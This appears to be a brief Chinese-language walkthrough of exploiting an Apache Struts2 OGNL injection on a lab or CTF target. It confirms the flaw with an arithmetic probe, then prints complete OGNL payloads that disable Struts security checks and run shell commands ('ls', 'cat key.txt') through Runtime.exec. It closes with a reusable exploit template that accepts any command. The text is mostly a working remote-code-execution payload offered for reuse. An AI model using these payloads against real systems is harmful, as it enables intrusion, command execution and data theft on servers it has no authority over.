测试漏洞
http://219.153.49.228:45828/${1+2}.action
![](http://upload-images.jianshu.io/upload_images/18546298-fea6560b164e782c.png?imageMogr2/auto-orient/strip|imageView2/2/w/704/format/webp)
表达式进行了计算,表示漏洞存在,开始构造exp
读取当前文件夹的文件
${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ls').getInputStream()),#q}.action
![](http://upload-images.jianshu.io/upload_images/18546298-eb5ddaed79e515fb.png?imageMogr2/auto-orient/strip|imageView2/2/w/1200/format/webp)
读取key.txt
${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat key.txt').getInputStream()),#q}.action
![](http://upload-images.jianshu.io/upload_images/18546298-6d579b6edd686197.png?imageMogr2/auto-orient/strip|imageView2/2/w/1037/format/webp)
Exp代码:
${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('[命令]').getInputStream()),#q}.action